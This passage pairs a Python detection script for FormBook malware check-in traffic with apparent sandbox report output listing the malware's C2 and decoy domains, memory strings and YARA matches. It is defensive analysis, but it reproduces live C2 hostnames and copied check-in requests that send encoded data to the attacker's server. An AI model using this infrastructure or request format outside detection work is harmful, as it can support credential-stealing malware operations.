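    "C2 list": ["www.cpuk-finance.com/dy13/"],
    "decoy": ["yr8gl32.vip", "cfuhtkwo.xyz", "nearmeacupuncture.com", "serco2020.com",
              "mrwine.xyz", "cioncarp4213.com", "520yhy.com", "txglobedev.com"],
}

# Constructed request log: two check-ins copied from the report, two benign requests added.
SAMPLE_REQUESTS: List[str] = [
    "GET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx"
    "&nL=S4247TXPfxsLR HTTP/1.1\r\nHost: www.yr8gl32.vip\r\nConnection: close\r\n\r\n",
    "GET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT"
    "&nL=S4247TXPfxsLR HTTP/1.1\r\nHost: www.cpuk-finance.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
    "Connection: keep-alive\r\n\r\n",
    "GET /api/?q=abc&page=2 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.0\r\n\r\n",
]


def parse_request(raw: str) -> Dict:
    """Split a raw HTTP/1.x request into method, path, query params and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: urllib's parse_qs would turn '+' into a space and break the base64 check.
    params = [tuple(part.partition("=")[::2]) for part in query.split("&") if part]
    return {"method": method, "path": path, "params": params, "headers": headers}


# Indicator regexes: ASSUMED shapes derived from this sample's nine requests.
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{8,20}$")
ONE_DIR_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
TWO_LETTER_KEY = re.compile(r"^[A-Za-z]{2}$")
MIN_INDICATORS = 3   # ASSUMED threshold; tune against your own traffic


def checkin_indicators(req: Dict) -> List[str]:
    reasons: List[str] = []
    if req["method"] != "GET":
        return reasons
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent header")
    if ONE_DIR_PATH.match(req["path"]):
        reasons.append("single short directory path")
    p = req["params"]
    if (len(p) == 2 and all(TWO_LETTER_KEY.match(k) for k, _ in p)
            and B64ISH.match(p[0][1]) and SHORT_TOKEN.match(p[1][1])):
        reasons.append("two 2-letter params: long base64-like value then short token")
    if req["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    return reasons


def is_checkin(req: Dict) -> bool:
    return len(checkin_indicators(req)) >= MIN_INDICATORS


def _host_only(entry: str) -> str:
    """Normalise 'www.host/path/' and 'host' to a bare registrable host for comparison."""
    host = entry.split("/", 1)[0].lower()
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, config: Dict[str, List[str]] = FORMBOOK_CONFIG) -> str:
    """'c2' if the host is in the config's C2 list, 'decoy' if in the decoy list, else 'unknown'."""
    h = _host_only(host)
    if h in {_host_only(e) for e in config["C2 list"]}:
        return "c2"
    if h in {_host_only(e) for e in config["decoy"]}:
        return "decoy"
    return "unknown"


def triage(raw_requests: List[str]) -> List[Tuple[str, bool, str]]:
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        out.append((host, is_checkin(req), classify_host(host)))
    return out


if __name__ == "__main__":
    for host, hit, role in triage(SAMPLE_REQUESTS):
        print(f"{host:28} checkin={hit!s:5} host_role={role}")
```

Both copied check-ins score all four indicators; the benign requests score zero and one respectively. The host classification is the part worth keeping in an incident: decoy contacts are noise that FormBook generates deliberately, and blocking only www.cpuk-finance.com is what the extracted config actually supports.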
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Windows\explorer.exe | Code function: getaddrinfo,setsockopt,recv | function 4_2_107D8F82
Source: global traffic | DNS traffic detected: DNS query: www.yr8gl32.vip
Source: global traffic | DNS traffic detected: DNS query: www.cfuhtkwo.xyz
Source: global traffic | DNS traffic detected: DNS query: www.cpuk-finance.com
Source: global traffic | DNS traffic detected: DNS query: www.nearmeacupuncture.com
Source: global traffic | DNS traffic detected: DNS query: www.serco2020.com
Source: global traffic | DNS traffic detected: DNS query: www.mrwine.xyz
Source: global traffic | DNS traffic detected: DNS query: www.cioncarp4213.com
Source: global traffic | DNS traffic detected: DNS query: www.520yhy.com
Source: global traffic | DNS traffic detected: DNS query: www.byfchfyr.xyz
Source: global traffic | DNS traffic detected: DNS query: www.txglobedev.com
Source: global traffic | DNS traffic detected: DNS query: www.whysco.com
Source: global traffic | DNS traffic detected: DNS query: www.jesuscrewofficial.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 04 Jul 2024 14:37:50 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: max-age=15 | Expires: Thu, 04 Jul 2024 14:38:05 GMT | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mPPvCPX69pcdROM7u5%2Fb0bkGZQlDADfUQbXkdcE%2B9yRj5Rme31K%2BqG8CruhJjR01jp2lTKm2BQRrLfTCFh9d9SpTsGuufrQ21vYbB%2BBW9ZrQtWG%2FAZ0n9g9t0wUrGPOPNULt1c%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 89dfdb042ff043bc-EWR | alt-svc: h3=":443"; ma=86400
Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots"
Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000004.00000002.4449069859.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000004.00000000.2006094320.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2007043460.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4454060731.0000000008890000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.520yhy.com
Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.520yhy.com/dy13/
Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.520yhy.com/dy13/www.byfchfyr.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.520yhy.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.com/dy13/www.northshorehousekeeping.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bum-arch.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyz/dy13/www.txglobedev.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.byfchfyr.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyz/dy13/www.tyupok.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cfuhtkwo.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.com/dy13/www.520yhy.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cioncarp4213.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.com/dy13/www.nearmeacupuncture.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cpuk-finance.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.com/dy13/www.nestormediaproduction.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jesuscrewofficial.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyz/dy13/www.cioncarp4213.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrwine.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.com/dy13/www.serco2020.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nearmeacupuncture.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.com/dy13/www.bum-arch.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nestormediaproduction.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.com/dy13/f
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.northshorehousekeeping.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.com/dy13/www.mrwine.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.serco2020.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.com/dy13/www.whysco.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.txglobedev.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyz/dy13/www.cpuk-finance.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tyupok.xyzReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.com/dy13/www.jesuscrewofficial.com
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whysco.comReferer:
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip/dy13/
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vip/dy13/www.cfuhtkwo.xyz
          Source: explorer.exe, 00000004.00000002.4457795777.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yr8gl32.vipReferer:
          Source: explorer.exe, 00000004.00000002.4457096271.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2009295246.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000000.2005162964.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.2005162964.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4452340558.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.2003858172.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3775632453.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094309396.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4450922376.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000004.00000003.3098476432.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3098065936.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009BA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3776759138.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000000.2009295246.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4457096271.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000004.00000000.2007606048.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

Source: Yara match; File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 1216, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wlanext.exe PID: 3876, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.tYEY1UeurGz0Mjb.exe.5640000.7.raw.unpack, -Module-.cs; Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
